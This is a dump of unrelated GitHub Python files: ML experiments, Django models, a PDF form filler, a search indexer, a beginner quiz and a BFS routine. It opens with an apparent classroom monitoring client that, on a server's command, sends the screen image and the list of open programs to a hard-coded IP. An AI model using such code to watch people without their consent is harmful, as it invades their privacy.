+{"seq_id":"739415570","text":"\nimport load\n\nload.init(\"./module\")\n\nfrom packet import Packet\nfrom sk import Client\nimport program\n\nfrom threading import Thread\nfrom PIL import ImageGrab\nimport numpy as np\nimport json\nimport time\n\n# set client\n# client = Client(\"125.182.224.34\", 8080)\nclient = Client(\"192.168.219.110\", 8080)\n\ndef getBackgroundImage() :\n    img = ImageGrab.grab().resize((650, 350))\n    img_list = np.array(img).tolist()\n\n    return img_list\n\nclient.connect()\n\nschool_info1 = input(\"Please enter your class : \")\nschool_info2 = input(\"Please enter your student ID : \")\n\nhandshake_packet = Packet(\"client_handshake\", school_info1)\nclient.send(handshake_packet.encode())\n\nsip_packet = Packet(\"sip\", school_info2)\nclient.send(sip_packet.encode())\n\ndef start() :\n    while True :\n        data = client.receive(1024)\n        p = Packet.decode(data)\n\n        if p.packet == \"program\" :\n            pro = json.dumps(program.getVisiableProgram()).encode()\n\n            # send packet length\n            pp_packet = Packet(\"pp\", pro)\n            pp_len_packet = Packet(\"pp_len\", len(pp_packet.encode()))\n            \n            client.send(pp_len_packet.encode())\n            client.send(pp_packet.encode())\n\n            print(p.packet)\n\n        elif p.packet == \"background\" :\n            background = json.dumps(getBackgroundImage())\n\n            # send packet length\n            ip_packet = Packet(\"ip\", background)\n            ip_len_packet = Packet(\"ip_len\", len(ip_packet.encode()))\n\n            client.send(ip_len_packet.encode())\n            client.send(ip_packet.encode())\n\n            print(p.packet)\n\n        elif p.packet == \"error\" :\n            print(p.data)\n\n            break\n\n        elif p.packet == \"exit\" :\n            print(\"client exit.\")\n\n            break\n\nstart()","repo_name":"moonsung1234/RCP","sub_path":"client_home.py","file_name":"client_home.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"30826482016","text":"# coding: utf-8\nimport json\nimport time\nimport torch\nimport torch.nn as mods\nimport torch.nn.functional as F\nfrom trainer import Trainer as CustomNetTrainer\nfrom experiment import Experimenter\nfrom dlc_practical_prologue import load_data, args\nfrom pprint import pprint\n\n\nclass CustomNet(torch.nn.Module):\n    \"\"\"Customizable CNN\n\n    Args:\n        is_cifar -- should be set to True if using CIFAR rather than MNIST\n        hidden_units -- size of the last hidden layer\n        exp_factor -- to experiment on \"pre-CE\" normalization\n    \"\"\"\n\n    def __init__(self, is_cifar=args.cifar, hidden_units=200, exp_factor=1):\n        super(CustomNet, self).__init__()\n        # If cifar dataset, 3 channels, if mnist only 1\n        self.conv1 = mods.Conv2d(3 if is_cifar else 1, 32, kernel_size=5)\n        self.conv2 = mods.Conv2d(32, 64, kernel_size=5)\n        self.fc1 = mods.Linear(256, hidden_units)\n        self.fc2 = mods.Linear(hidden_units, 10)\n        self.exp_factor = exp_factor\n\n    def forward(self, x):\n        x = F.relu(F.max_pool2d(self.conv1(x), kernel_size=3, stride=3))\n        x = F.relu(F.max_pool2d(self.conv2(x), kernel_size=2, stride=2))\n        x = x.view(-1, 256)\n        x = F.relu(self.fc1(x))\n        x = self.fc2(x)\n        if self.exp_factor > 0:\n            x = F.log_softmax(x.pow(self.exp_factor))\n        elif self.exp_factor == 0:\n            x = F.log_softmax(x.exp())\n        elif self.exp_factor == -1:\n            x = x.div(x.sum())\n        return x\n\n\nclass CustomNetConv3(torch.nn.Module):\n\n    def __init__(self, 
hidden_units=200):\n        super(CustomNetConv3, self).__init__()\n        self.conv1 = mods.Conv2d(1, 16, kernel_size=3)\n        self.conv2 = mods.Conv2d(16, 32, kernel_size=4)\n        self.conv3 = mods.Conv2d(32, 64, kernel_size=2)\n        self.fc1 = mods.Linear(256, hidden_units)\n        self.fc2 = mods.Linear(hidden_units, 10)\n\n    def forward(self, x):\n        x = F.relu(F.max_pool2d(self.conv1(x), 2))\n        x = F.relu(F.max_pool2d(self.conv2(x), 2))\n        x = F.relu(F.max_pool2d(self.conv3(x), 2))\n        x = x.view(-1, 256)\n        x = F.relu(self.fc1(x))\n        return self.fc2(x)\n\n\nparameters = dict(\n    steps=50,\n    optimizer_class=torch.optim.Adam,\n    optimizer_params=dict(),\n    minibatch_size=args.batchsize,\n)\n\n\ndatasets = dict(\n    cifar=dict(normal=None, full=None),\n    mnist=dict(normal=None, full=None),\n)\n\n\ndef get_data(name='cifar' if args.cifar else 'mnist',\n             size='full' if args.full else 'normal'):\n    \"\"\"Retrieves desired dataset\n\n    Args:\n    name -- name of dataset, defaults to mnist or commandline\n    size -- 'normal' for restricted version of dataset to 1000 examples, 'full' otherwise\n    \"\"\"\n    if datasets[name][size]:\n        return datasets[name][size]\n\n    # Initialize data\n    train_data, train_target, test_data, test_target = load_data(\n        normalize=True,\n        one_hot_labels=False,\n        flatten=False,\n        cifar=True if name == 'cifar' else False,\n        data_size=size,\n    )\n\n    # Adapt it for GPU computation if appropriate\n    datasets[name][size] = dict(\n        training_input=train_data if not(torch.cuda.is_available()) else train_data.cuda(),\n        training_target=train_target if not(torch.cuda.is_available()) else train_target.cuda(),\n        test_input=test_data if not(torch.cuda.is_available()) else test_data.cuda(),\n        test_target=test_target if not(torch.cuda.is_available()) else test_target.cuda(),\n    )\n\n    return datasets[name][size]\n\n\nclass Xprunner(object):\n    \"\"\"Wrapper class to run Experimenter more efficiently \"\"\"\n\n    def __init__(self):\n        pass\n\n    def conv3_experiment(self):\n        \"\"\"3 conv layer experiment (ex. 4)\"\"\"\n        data = get_data()\n\n        def conv3_xp(convnet):\n            parameters['step'] = 100\n            return CustomNetTrainer(convnet(), data, parameters).train()\n\n        results = Experimenter(conv3_xp).experiment(\n            {'convnet': [CustomNetConv3, CustomNet]},\n            iterations=5\n        )\n        with open(\"conv3_xp_{}_{}.json\".format(args.suffix, int(time.time())), 'w') as res_file:\n            json.dump(results, res_file)\n\n    def hidden_layer_experiment(self, hidden_layers=[10, 50], iters=1, cifar=False):\n        \"\"\"Hidden layer experiment (ex. 
3)\"\"\"\n data = get_data()\n\n def compute_hidden_layer_test_error(hidden_layer_size):\n return CustomNetTrainer(\n CustomNet(hidden_units=hidden_layer_size),\n data,\n parameters,\n loss=mods.CrossEntropyLoss()\n ).train()\n\n return Experimenter(compute_hidden_layer_test_error, pprint).experiment(\n {'hidden_layer_size': hidden_layers},\n iterations=iters,\n json_dump=True,\n )\n\n def sgd_experiment(self):\n \"\"\"\n Trying various SGD parameters to see how they influence learning speed\n (by using the proxy of accuracy at a fixed speed)\n \"\"\"\n def compute_optimizer_test_error(optim):\n parameters = dict(\n steps=25,\n optimizer_class=optim['class'],\n optimizer_params=optim['params'],\n minibatch_size=args.batchsize,\n )\n return CustomNetTrainer(CustomNet(), get_data(), parameters).train()\n\n return Experimenter(compute_optimizer_test_error, pprint).experiment(\n {'optim': [\n {'class': torch.optim.SGD, 'params': {'lr': 0.1, 'momentum': 0}},\n {'class': torch.optim.SGD, 'params': {'lr': 0.2, 'momentum': 0}},\n {'class': torch.optim.SGD, 'params': {'lr': 0.05, 'momentum': 0}},\n {'class': torch.optim.SGD, 'params': {'lr': 0.1, 'momentum': 1}},\n {'class': torch.optim.SGD, 'params': {'lr': 0.2, 'momentum': 1}},\n {'class': torch.optim.SGD, 'params': {'lr': 0.05, 'momentum': 1}},\n {'class': torch.optim.SGD, 'params': {'lr': 0.1, 'momentum': 0.5}},\n {'class': torch.optim.SGD, 'params': {'lr': 0.2, 'momentum': 0.5}},\n {'class': torch.optim.SGD, 'params': {'lr': 0.05, 'momentum': 0.5}},\n {'class': torch.optim.Adam, 'params': {}}\n ]\n },\n iterations=5,\n json_dump=True,\n )\n\n def loss_experiment(self):\n \"\"\"\n Tries multiple losses to see which performs best\n \"\"\"\n def compute_loss_test_error(exp_factor, dataset, dataset_size):\n return CustomNetTrainer(\n CustomNet(is_cifar=(dataset == 'cifar')),\n get_data(dataset, dataset_size),\n parameters,\n mods.NLLLoss()\n ).train(25)\n\n return Experimenter(compute_loss_test_error, pprint).experiment(\n {\n 'exp_factor': [-1, 0, 0.1, 1, 15],\n 'dataset': ['mnist', 'cifar'],\n 'dataset_size': ['normal', 'full'],\n },\n iterations=10,\n json_dump=True,\n )\n\n def default_xp(self):\n global data\n data = get_data()\n pprint(self.hidden_layer_experiment())\n","repo_name":"philipperolet/tensor","sub_path":"main_lossxp1.py","file_name":"main_lossxp1.py","file_ext":"py","file_size_in_byte":7181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3981365910","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.validators import MaxValueValidator, MinValueValidator\n\nclass Feedback(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n feedback = models.TextField(max_length=4096, null=True, blank=True)\n context = models.TextField(max_length=4096*4, null=True, blank=True)\n\n human_approved = models.BooleanField(default=False)\n human_edited = models.BooleanField(default=False)\n user_feedback = models.TextField(max_length=4096, null=True, blank=True)\n\n planner_score = models.FloatField(default=0.0, validators=[MinValueValidator(0.0), MaxValueValidator(100.0)])\n guardian_score = models.FloatField(default=0.0, validators=[MinValueValidator(0.0), MaxValueValidator(100.0)])\n mentor_score = models.FloatField(default=0.0, validators=[MinValueValidator(0.0), MaxValueValidator(100.0)])\n motivator_score = models.FloatField(default=0.0, validators=[MinValueValidator(0.0), MaxValueValidator(100.0)])\n 
assessor_score = models.FloatField(default=0.0, validators=[MinValueValidator(0.0), MaxValueValidator(100.0)])\n\n def __str__(self):\n return \"{}. {}\".format(str(self.id), self.user)\n \nclass LearnerModel(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n full_name = models.CharField(max_length=1024, null=True, blank=True)\n school_level = models.CharField(max_length=1024, null=True, blank=True)\n years_of_experience = models.FloatField(default=0.0)\n role = models.CharField(max_length=4096, null=True, blank=True)\n skill_interests = models.TextField(max_length=4096, null=True, blank=True)\n other_interests = models.TextField(max_length=4096, null=True, blank=True)\n\n school = models.CharField(max_length=1024, null=True, blank=True)\n\n planner_score = models.FloatField(default=0.0)\n guardian_score = models.FloatField(default=0.0)\n mentor_score = models.FloatField(default=0.0)\n motivator_score = models.FloatField(default=0.0)\n assessor_score = models.FloatField(default=0.0)\n\n series_completed = models.CharField(max_length=1024, null=True, blank=True) # JSON. e.g. {'teaching': 2, 'coaching': 2, 'digital': 3}\n\n current_feedback = models.ForeignKey(Feedback, on_delete=models.SET_NULL, null=True, blank=True)\n cluster = models.IntegerField(default=0, null=True, blank=True)\n\n def __str__(self):\n return \"{}. {}\".format(str(self.id), self.user)\n \nclass Track(models.Model):\n title = models.CharField(max_length=4096)\n\n def __str__(self):\n return \"{}: {} \".format(str(self.id), self.title)\nclass Series(models.Model):\n title = models.CharField(max_length=4096)\n track = models.ForeignKey(Track, on_delete=models.CASCADE, null=True, blank=True)\n track_order = models.IntegerField(default=0, null=True, blank=True)\n\n primary_level = models.BooleanField(default=False)\n secondary_level = models.BooleanField(default=False)\n admin_level = models.BooleanField(default=False)\n\n def __str__(self):\n return \"{}: {} \".format(str(self.id), self.title)\nclass Video(models.Model):\n title = models.CharField(max_length=4096)\n tags = models.CharField(max_length=4096, help_text = \"comma-separated list of tags\")\n description = models.CharField(max_length=4096, default=\"\")\n url = models.CharField(max_length=1024, unique=True)\n\n series = models.ForeignKey(Series, on_delete=models.CASCADE, null=True, blank=True)\n series_order = models.IntegerField(default=0, null=True, blank=True)\n\n def __str__(self):\n return \"{}. {}\".format(str(self.id), self.title)\n \n class Meta:\n ordering = ('series_order', )\n\nclass VideoQuestion(models.Model):\n video = models.ForeignKey(Video, on_delete=models.CASCADE)\n question = models.CharField(max_length=4096)\n type = models.CharField(max_length=100) # MCQ (multiple choice) or OEQ (open-ended)\n possible_answers = models.CharField(max_length=4096, null=True, blank=True, help_text = \"Please leave blank if OEQ\")\n\n def __str__(self):\n return \"{}: {}\".format(self.video, self.question)\n\nclass Module(models.Model):\n video = models.ForeignKey(Video, on_delete=models.CASCADE)\n questions = models.ManyToManyField(VideoQuestion)\n title = models.CharField(max_length=4096, null=True, blank=True)\n\n def __str__(self):\n module_name = self.title if self.title else str(self.id)\n return \"{}. 
{}\".format(str(self.id), module_name)\n\nclass ModuleCompletion(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n module = models.ForeignKey(Module, on_delete=models.CASCADE)\n time_spent = models.FloatField(null=True, blank=True, default=0.0)\n complete = models.BooleanField(default=False)\n feedback_rating = models.FloatField(default=0.0, null=True, blank=True)\n feedback = models.CharField(max_length=4096, null=True, blank=True)\n\n def __str__(self):\n return \"{} finished {}\".format(self.user, self.module.video)\n \nclass AnswerToVideoQuestion(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n video = models.ForeignKey(Video, on_delete=models.CASCADE)\n question = models.ForeignKey(VideoQuestion, on_delete=models.CASCADE)\n answer = models.CharField(max_length=4096)\n\n def __str__(self):\n return \"{} - {}\".format(self.question, self.user)\n\nclass RecommendationQueue(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n list_of_ids = models.CharField(max_length=1024, null=True, blank=True) # Series IDs for right now\n\n def __str__(self):\n return \"{}: {} \".format(self.user, self.list_of_ids)\n","repo_name":"chriskok/cikguhub","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33718374501","text":"# 1\r\nhasil_akhir = [\r\n{'nama':'Reza', 'nilai':70},\r\n{'nama':'Ciut', 'nilai':63},\r\n{'nama':'Dian', 'nilai':80},\r\n{'nama':'Badu', 'nilai':40}\r\n]\r\n\r\ndef predikatlulus(data):\r\n lulus = [mahasiswa['nama']\r\n for mahasiswa in data\r\n if mahasiswa ['nilai'] > 65]\r\n return lulus\r\n\r\nhasil = predikatlulus(hasil_akhir)\r\nprint('siswa yang lulus :',hasil)\r\n\r\n#2\r\nbuah = ['pepaya', 'mangga', 'pisang', 'durian', 'jambu']\r\n\r\ndef list_buah(buah):\r\n list_terbalik = []\r\n for i in range(len(buah)-1, -1, -1):\r\n list_terbalik.append(buah[i])\r\n return list_terbalik\r\n\r\nhasil = list_buah(buah)\r\nprint('urutan setelah dibalik :', hasil)\r\n\r\n#3\r\nbuah = ['pepaya', 'mangga', 'pisang', 'durian', 'jambu']\r\n\r\ndef duplikasi(list_buah):\r\n list_duplikasi = []\r\n for buah in list_buah:\r\n list_duplikasi.append(buah)\r\n list_duplikasi.append(buah)\r\n return list_duplikasi\r\n\r\nhasil = duplikasi(buah)\r\nprint (hasil)\r\n\r\n#4\r\nkalimat = \"Nurul Fikri\"\r\n\r\ndef konsonan(kalimat):\r\n huruf = \"\"\r\n\r\n for i in kalimat:\r\n if i not in \"aiueo\":\r\n huruf += i\r\n return huruf\r\n\r\nhasil = konsonan('Nurul Fikri')\r\nprint('huruf konsonan dari kata nurul fikri adalah', hasil)","repo_name":"flymetudemoon/DDP","sub_path":"Quiz9.py","file_name":"Quiz9.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16209726612","text":"from PyPDF2 import PdfFileWriter, PdfFileReader\nimport io\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.pagesizes import letter\n\n\ndef projectHeader(can, name, team):\n can.drawString(125, 650, name)\n can.drawString(400, 650, team)\n\n\ndef vendor(can, name, contact, address, city, number, fax, email):\n can.drawString(217, 605, name)\n can.drawString(217, 592, contact)\n can.drawString(217, 575, address)\n can.drawString(217, 550, city)\n can.drawString(217, 535, number)\n can.drawString(217, 520, fax)\n can.drawString(217, 505, email)\n\n\ndef add_Item(can, amount, partNum, 
partName, unitPrice, lineNum):\n lineNum %= 5\n #42\n can.drawString(65, 460 - (lineNum * 29), str(int(amount)))\n can.drawString(92, 460 - (lineNum * 29), partNum)\n can.drawString(450, 460 - (lineNum * 29), \"$\" + str(unitPrice))\n can.drawString(500, 460 - (lineNum * 29), \"$\" + str(amount * unitPrice))\n\n if len(partName)>42:\n wordIndex = 0\n letterIndex = 0\n words = partName.split(\" \")\n for word in words:\n letterIndex += len(word)\n if letterIndex >42:\n letterIndex-=len(word)\n break\n letterIndex+=1\n can.setFontSize(10)\n can.drawString(175, 460 - (lineNum * 28)+5, partName[0:letterIndex-1])\n can.drawString(175, 460 - (lineNum * 28)-10, partName[letterIndex:len(partName)])\n else:\n can.drawString(175, 460 - (lineNum * 28), partName)\n return amount * unitPrice\n\n\ndef createPdf(parts, team, company,count):\n # Create Page\n packet = io.BytesIO()\n can = canvas.Canvas(packet, pagesize=letter)\n\n projectHeader(can, \"Alex\", \"BrainBot\")\n\n # Vendor Input\n vendor(can, \"amazon\", \"\", \"380 john st\", \"Rochester\", \"696-969-6969\", \"Fax Who?\", \"corgie@rit.edu\")\n\n # Part Purchase\n subTotal = 0.0\n for i in range(len(parts)):\n subTotal += add_Item(can,parts[i].quantity, \"\", parts[i].part, parts[i].price, i)\n\n\n can.drawString(500, 323, \"$\" + str(subTotal))\n # Name Line\n can.drawString(300, 243, \"Alex Burbano arb8590@rit.edu\")\n can.drawString(530, 243, \"9/20/21\")\n can.save()\n # move to the beginning of the StringIO buffer\n packet.seek(0)\n\n # create a new PDF with Reportlab\n new_pdf = PdfFileReader(packet)\n # read your existing PDF\n existing_pdf = PdfFileReader(open(\"Form.pdf\", \"rb\"))\n output = PdfFileWriter()\n # add the \"watermark\" (which is the new pdf) on the existing page\n page = existing_pdf.getPage(0)\n page.mergePage(new_pdf.getPage(0))\n output.addPage(page)\n # finally, write \"output\" to a real file\n outputStream = open(\"./finished/\" + team +\"-\"+ company+\"-\"+str(count) + \".pdf\", \"wb\")\n output.write(outputStream)\n outputStream.close()\n\n\ndef createPdfs(partDictionary):\n for team in partDictionary:\n for company in partDictionary[team]:\n for i in range(len(partDictionary[team][company])):\n createPdf(partDictionary[team][company][i], team, company,i)\n","repo_name":"Alexandr5656/MDRC-Form","sub_path":"PDF.py","file_name":"PDF.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73879155112","text":"# Team Members:\n# Joanna Chen, 66238804\n# Yui Guo, 75458764\n# Weiyu Hao, 59955246\n# Ruiyang Wang, 52294785\n\nfrom bs4 import BeautifulSoup, SoupStrainer\nimport nltk\nfrom nltk.tokenize import word_tokenize\nimport os, json, pickle\nfrom collections import defaultdict\nfrom invert_index import InvertedIndex\nfrom nltk.stem import PorterStemmer\nfrom nltk.corpus import words\nfrom lxml import etree\n\n# import requests\nimport time\n\n#nltk.download('words')\nenglish_words = words.words()\nperform_index = {}\n\n#word_freq = defaultdict(int)\nID_dict = defaultdict(str) # {doc_id: url}\nID_count = 1\nTEST_SIZE = 999999\n\nbatch_size = 20000 # 20000\nfile_index = 1\n\nfile_list = []\n\nindex_dict = InvertedIndex()\n\nps = PorterStemmer()\n\ndef createID(url):\n global ID_count\n if url not in ID_dict.values():\n ID_dict[ID_count] = url\n ID_count += 1\n return ID_count - 1\n else:\n return list(ID_dict.keys())[list(ID_dict.values()).index(url)]\n\n\ndef read_files():\n # path_to_json = 'DEV/www_ics_uci_edu/'\n 
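# Assumed corpus layout (illustrative): DEV/<domain>/<page>.json, where each\n    # JSON file carries the 'url', 'content' and 'encoding' keys read below.\n    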
path_to_json = 'DEV/'\n # Get all the directories within the path\n dirs = [path for path in os.listdir(path_to_json)]\n json_files = []\n for d in dirs:\n if d.startswith('.'):\n continue\n path = path_to_json + d + '/'\n print(path)\n\n # testing only\n #if path == 'DEV/cbcl_ics_uci_edu/':\n\n # Process files from each directory\n dir_files = [pos_json for pos_json in os.listdir(path) if pos_json.endswith('.json')]\n \n process_files(path, dir_files)\n # for last time append\n global file_index\n print(f'####################\\n{ID_count}\\n######################')\n memory_file = \"memory_file_\" + str(file_index) + \".txt\"\n file_list.append(memory_file)\n f = open(memory_file, \"w\")\n small_sorted_dict = sorted(index_dict.index.items())\n for i in small_sorted_dict:\n f.write(f'{i[0]}---{i[1]}\\n')\n file_index += 1\n print(file_index)\n index_dict.index = defaultdict(dict)\n f.close()\n\n\ndef process_files(json_path, files):\n counter = 1\n\n print(f\"STARTING: {json_path}, TEST SIZE: {str(TEST_SIZE)}\")\n counter = 1\n for file_name in files:\n # # politeness 0.3s:\n # time.sleep(0.3)\n if counter > TEST_SIZE:\n break\n\n # Keep track of progress\n if counter % 50 == 0:\n print(\"INDEXING...: \" + str(counter))\n counter += 1\n\n global file_index\n if ID_count % batch_size == 0:\n print(f'####################\\n{ID_count}\\n######################')\n memory_file = \"memory_file_\" + str(file_index) + \".txt\"\n file_list.append(memory_file)\n f = open(memory_file, \"w\")\n small_sorted_dict = sorted(index_dict.index.items())\n for i in small_sorted_dict:\n f.write(f'{i[0]}---{i[1]}\\n')\n file_index += 1\n print(file_index)\n index_dict.index = defaultdict(dict)\n f.close()\n\n with open(os.path.join(json_path, file_name), 'r') as f:\n # loads the dictionary inside each json file\n data = json.load(f)\n # Get three elements\n url = data['url']\n content = data['content']\n encode = data['encoding']\n\n # no need to check validility of url\n # check if url is duplicated\n doc_ID = createID(url)\n # print(f'doc_ID: {doc_ID}')\n\n soup = BeautifulSoup(content, \"html.parser\")\n h1 = soup.find('h1')\n h2 = soup.find('h2')\n h3 = soup.find('h3')\n b = soup.find('b')\n text = soup.get_text()\n\n tokens = tokenize(text, doc_ID, h1,h2,h3,b)\n\n #print(word_freq)\n\n \ndef score_token(text, token,h1,h2,h3,b):\n # Define a dictionary to hold the scores\n tag_scores = {'h1': 20, 'h2': 19, 'h3': 18, 'b': 10}\n\n # # Define a CSS selector to find multiple tags\n # selector = 'h1, h2'\n\n # # Find all occurrences of the specified tags using the CSS selector\n # tags = soup.select(selector)\n\n #soup = BeautifulSoup(text, 'html.parser')\n\n if h1:\n if token in h1.get_text():\n #print('h1')\n return [token, 20]\n if h2:\n if token in h2.get_text():\n #print('h2')\n return [token, 19]\n if h3:\n if token in h3.get_text():\n #print('h3')\n return [token, 18]\n if b:\n if token in b.get_text():\n #print('b')\n return [token, 10]\n\n # # Find the first tag of this type\n # for tag in tags:\n # #print(tag)\n # if token in tag.get_text():\n # #return [token, 0]\n # return [token, tag_scores.get(tag.name, 0)]\n \n # If the token was not found in any of the tags, return a score of 0\n return [token, 0]\n\ndef tokenize(text, doc_ID, h1,h2,h3,b):\n # nltk to tokenize the text provided\n tokens = word_tokenize(text)\n\n # update the word_frequency dictionary and give the word count of this page\n token_count = 0\n for token in tokens:\n word = token.lower()\n if word.isalnum():\n #find the score of this 
token for the first time it appears in the context['This', 19]\n word2 = ps.stem(word)\n \n #word_freq[word2] += 1\n if doc_ID in index_dict.index[word2]:\n #just increment the frequency within a doc\n index_dict.index[word2][doc_ID][0] += 1\n else:\n #update the token_value according to the first appearance\n token_value = score_token(text, word,h1,h2,h3,b)[1]\n token_count += 1\n index_dict.index[word2][doc_ID] = [1, token_value] # [1, token_value]\n #print(index_dict.index)\n return list(set(tokens))\n\n\ndef merge_file():\n \n # file1 = open(file_list[0], \"r+\")\n # file2 = open(file_list[1], \"r+\")\n # file3 = open(file_list[2], \"r+\")\n\n file1 = open('memory_file_1.txt', \"r+\")\n file2 = open('memory_file_2.txt', \"r+\")\n file3 = open('memory_file_3.txt', \"r+\")\n\n t1 = file1.readline()\n t2 = file2.readline()\n t3 = file3.readline()\n\n counter = 0\n while t1 != '' or t2 != '' or t3 != '':\n if counter % 100 == 0:\n #print(t1,t2,t3)\n pass\n counter += 1\n token_list = [None, None, None] #['token', {}]\n if t1 != '':\n token1 = t1.split(\"---\")\n token_list[0] = token1\n if t2 != '':\n #print(\"2: \",t2)\n token2 = t2.split(\"---\")\n token_list[1] = token2\n if t3 != '':\n token3 = t3.split(\"---\")\n token_list[2] = token3\n\n # Find the smallest token from lists and the index\n filtered_list = [word for word in token_list if word is not None]\n min_list = min(filtered_list,key=lambda x:x[0]) #['token', {}]\n min_token = min_list[0] #return token\n min_file = token_list.index(min_list) #return file number\n\n next_list = [min_file] #files that need to move to next line\n merge_list = []\n min_dict = eval(token_list[min_file][1])\n merge_list.append(min_dict)\n\n #merged_file = open('index.txt', 'a')\n with open('index.txt', 'a') as merged_file:\n\n for i in range(len(token_list)):\n if i != min_file:\n if token_list[i] != None and min_token == token_list[i][0]:\n merge_list.append(eval(token_list[i][1]))\n next_list.append(i)\n\n if len(merge_list) > 1:\n merge_dict = merge_list[0]\n for i in merge_list[1:]:\n for k, v in i.items():\n merge_dict[k] = v\n #print(merge_dict)\n #print(min_token + '---' + str(merge_dict))\n merged_file.write(min_token + '---' + str(merge_dict) + '\\n')\n merged_file.flush()\n else:\n #print(min_token + '---' + str(merge_dict))\n merged_file.write(min_token + '---' + str(min_dict) + '\\n')\n merged_file.flush()\n\n if len(next_list) == 0:\n return\n\n for i in next_list: # [0,1]\n #print(f\"printing next list: {i}\")\n if i == 0 and t1 != '':\n t1 = file1.readline()\n #print(f\"1!!!{t1}\")\n elif i == 1 and t2 != '':\n t2 = file2.readline()\n #print(f\"2!!!{t2}\")\n elif i == 2 and t3 != '':\n t3 = file3.readline()\n #print(f\"3!!!{t3}\")\n #merged_file.close()\n\n\n\n\n# start the program\nif __name__ == '__main__':\n read_files()\n\n # sorted_index = sorted(index_dict.index.items())\n\n count = 0\n\n merge_file()\n\n perform_index = {}\n\n f2 = open('main_index.txt', \"w+\")\n\n # with open('ori_index.txt', 'w') as f:\n # # f2.write(str(len(sorted_index)//100) + '\\n')\n # for i in sorted_index:\n # if count % 1000 == 0:\n f = open('index.txt', \"r\")\n byte = 0\n text = f.readlines()\n\n common_words = ('computer','science','machine','learning','engineering',\"algorithm\",\\\n \"data\", \"program\", \"code\", \"variable\", \"function\", \"class\", \"object\", \"interface\", \\\n \"method\", \"loop\", \"conditional\", \"what\", \"array\", \"list\", \"string\", \"integer\", \"boolean\",\\\n \"file\", \"database\", \"network\", \"server\", 
\"client\", \"protocol\", \"encryption\",\\\n \"decryption\", \"memory\", \"cpu\", \\\n \"gpu\", \"cache\", \"thread\", \"process\", \"concurrency\", \"parallelism\", \"big data\", \\\n \"artificial intelligence\", \"machine learning\", \"deep learning\", \"neural network\",\\\n \"cloud computing\", \"virtualization\", \"or\", \"web development\", \"api\", \"framework\", \"security\", \"vulnerability\", \"debugging\", \"testing\", \"software\", \"hardware\", \"database\", \"management\", \"data\", \"structure\", \"algorithmic\", \"to\", \"complexity\", \"be\", \"recursion\", \"sorting\", \"searching\", \"graph\", \"tree\", \"linked\", \"list\", \"queue\", \"stack\", \"hashing\", \"operating\", \"system\", \"file\", \"networking\", \"client\", \"server\", \"internet\", \"cybersecurity\", \"cryptography\", \"authentication\", \"authorization\", \"privacy\", \"integrity\", \"cloud\", \"storage\", \"distributed\", \"computing\", \"virtual\", \"machine\", \"web\", \"not\", \"application\", \"mobile\", \"app\", \"responsive\", \"design\", \"user\", \"interface\", \"experience\", \"agile\", \"development\", \"version\")\n\n for i in text:\n #f2.write(f\"{i[0]} {os.stat('ori_index.txt').st_size}\\n\")\n # save the most common token in cache\n if i.split('---')[0] in common_words:\n perform_index[i.split('---')[0]] = eval(i.split('---')[1])\n\n if count % 800 == 0: # this creates 800 main index, and each with 800 interval\n f2.write(f\"{i.split('---')[0]} {byte}\\n\")\n \n byte += len(i.encode())\n #f.write(f'{i[0]}---{i[1]}\\n')\n #f.flush()\n count += 1\n f2.close()\n f.seek(7801)\n #print(f.readline())\n f.close()\n with open(\"perform_index.json\",'w') as file:\n json.dump(perform_index,file)\n with open('urls.json', 'w') as f3:\n json.dump(ID_dict, f3)\n\n # # get size of the file in KB\n # file_size = os.path.getsize('index.txt') / 1024\n\n # # generate report\n # with open('report.txt', 'w+') as file:\n # file.write(\"Team Members:\\n\")\n # file.write(\"Joanna Chen, 66238804\\n\")\n # file.write(\"Yui Guo, 75458764\\n\")\n # file.write(\"Weiyu Hao, 59955246\\n\")\n # file.write(\"Ruiyang Wang, 52294785\\n\")\n # file.write(\"\\n\\n\\n\\n\")\n # file.write(\"Number of Documents: \" + str(ID_count))\n # file.write(\"\\n\\n\")\n # file.write(\"Number of Unique Tokens: \" + str(len(index_dict.index)))\n # file.write(\"\\n\\n\")\n # file.write(\"File size of index in disk is \" + str(round(file_size, 2)) + \"KB\")\n # file.write(\"\\n\\n\")\n # file.write(\"DocID with URLs:\\n\")\n # for k, v in ID_dict.items():\n # file.write(f'DocID {k} ----- {v}\\n')\n\n # for k,v in index_dict.index.items():\n # print(f\"###########{k}: -------------{v}\")\n # print(f'url {ID_dict[list(v.keys())[0]]} for key {v}')\n","repo_name":"WHao-0923/Engine","sub_path":"generate_index.py","file_name":"generate_index.py","file_ext":"py","file_size_in_byte":12352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7322165773","text":"from queue import *\n# Using built-in queue function\n\n# time complexity: O(n)\n# sapce complexity: O(1) -- best; O(n) -- worst, average \n\n# Get inspiration from here: https://blog.csdn.net/coder_orz/article/details/51363095\n# from queue import *\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.left_child = None\n self.right_child = None\n\ndef level_order(node):\n q = Queue() # Using put(), get() for enque and deque\n \n # node is not None\n if node:\n q.put(node)\n while not q.empty():\n current = 
